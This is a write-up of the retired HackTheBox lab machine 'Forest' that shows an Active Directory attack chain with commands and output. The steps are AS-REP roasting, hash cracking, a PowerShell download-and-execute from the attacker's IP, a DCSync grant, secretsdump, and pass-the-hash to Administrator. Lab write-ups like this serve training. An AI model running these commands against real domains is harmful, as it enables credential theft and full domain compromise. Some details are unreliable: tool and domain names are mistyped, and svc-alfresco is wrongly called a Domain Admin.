HackTheBox - Forest
OS | Difficulty | IP Address | Status |
---|---|---|---|
Windows | Easy | 10.10.10.161 | Retired |
This box maybe classified as an easy machine but takes prior knowledge to solve, made by egre55 and mrb3n on HackTheBox. We gain our foothold by enumerating RPC where we get usernames, then we will Kerberoast the usernames until we get a Kerberos ticket hash, then crack it and get in as the user. For privilege escalation, we will abuse Access Control List-based permission to add a new user, add the new user to a group that will enable us to get the Administrator hash; we will use Pass-The-Hash and login as Administrator.
Phase 1 - Enumeration
Nmap
As usual, we start phase one with nmap, to see what ports are opened.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-16 13:35:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m42s, deviation: 4h02m30s, median: 10m41s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-07-16T06:35:20-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-16T13:35:19
|_ start_date: 2021-07-16T07:07:42
A quick glance at the nmap results, we can tell right away that its a Windows machine running Active Directory which indicates that it is a domain controller. Also, the results show that the operating system is Windows Server 2016.
RPC
rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
...
...
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Through RPCClient, we get a few usernames, also one of the user (svc-alfresco) is a Domain Admin, which means that user has higher level privileges.
Phase 2 - Exploitation
AS-REP Roasting with Impacket
So let’s try Impacket’s GetBPUsers.py to see if we can get a Kerberos hash.
python3 GetNPUsers.py --no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:8ae2335d8b1ee8340d19b5577220ba6c$60b28211b189343f297096f45cb5f9fd5e489eeb97873eca43383ed465247259fba7ef471e55bbadbb2659ac590eaf0f15a701e28d74d8f8a15a35770ab9cdfa1b8fb8e66608e5812dfc9068c2bf814df0b9e25f979035a582bdee2e8a5745ef09be73bf2a480b8214b247f33e476da73b385812f3fa21932fbba6bac1bafcc9ccc45cfbf5d7de8c7bd531449ab6984ff3ad01a156932c95970abe9295be6d62a069ce153a3933e7748eda90b737705b993f334463bb374d65ca36054078bdeb94e64aa391bbb2a997c5d
# NOTE: we have intentionally edited the below hash so other HackTheBox players don't copy it and cheat their way to user
Hash Cracking with Hashcat
Since we got a hash, let’s attempt to crack it.
hashcat -m 18200 svc-alfresco.kerb /usr/share/wordlists/rockyou.txt --force
RESULT: s3rvice
Now we have a username and password, let’s login, enumerate the user further to find a way to escalate our privileges.
evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice
Info: Starting Evil-WinRM shell v1.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Phase 3 - Privilege Escalation
Using a few different enumeration tools, we came to know that the user ‘svc-alfresco’ who is the part of Domain Admins, is also part of a special DC group called ‘Account Operators.’ Accounts in this special group enables its members to create accounts and add them to the ‘Exchange Windows Permissions Group.’
So, that exactly what we are going to do, we’ll use svc-alfresco to create a new account and add that account to the ‘Exchange Windows Permissions Group.’
# we create a new user account
net user potato 'Potato123' /add /domain
# and add the new account to the group
net group "Exchange Windows Permissions" /add potato
ACL-based Escalation
Once our new user in the Exchange Windows Permissions group, we can proceed to abuse the WriteDacl with PowerView to allow the newly created users to gain password hashes of other accounts.
# to copy over PowerView as it contains functions needed
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.89:8000/PowerView.ps1')
# creating a variable for plain password
$pass = ConvertTo-SecureString 'Potato123' -AsPlainText -Force
# encoding our password variable
$cred = New-Object System.Management.Automation.PSCredential('HTB\potato', $pass)
# loading the PowerView script to execute its functions
Import-Module .\PowerView.ps1
# PowerView function to execute ACL-based privilege escalation
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity potato -Rights DCSync
Once the above is ran, we can use Impacket’s SecretsDump.py to dump hashes of all existing users, including the Administrator.
python3 secretsdump.py htb.lcoal/potato:Potato123@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
And there we have it, we got the Administrator’s password hash; let’s attempt to login using pass-the-hash instead of cracking the hash.
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 htb.local/administrator@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
We are now Administrator.
Post a Comment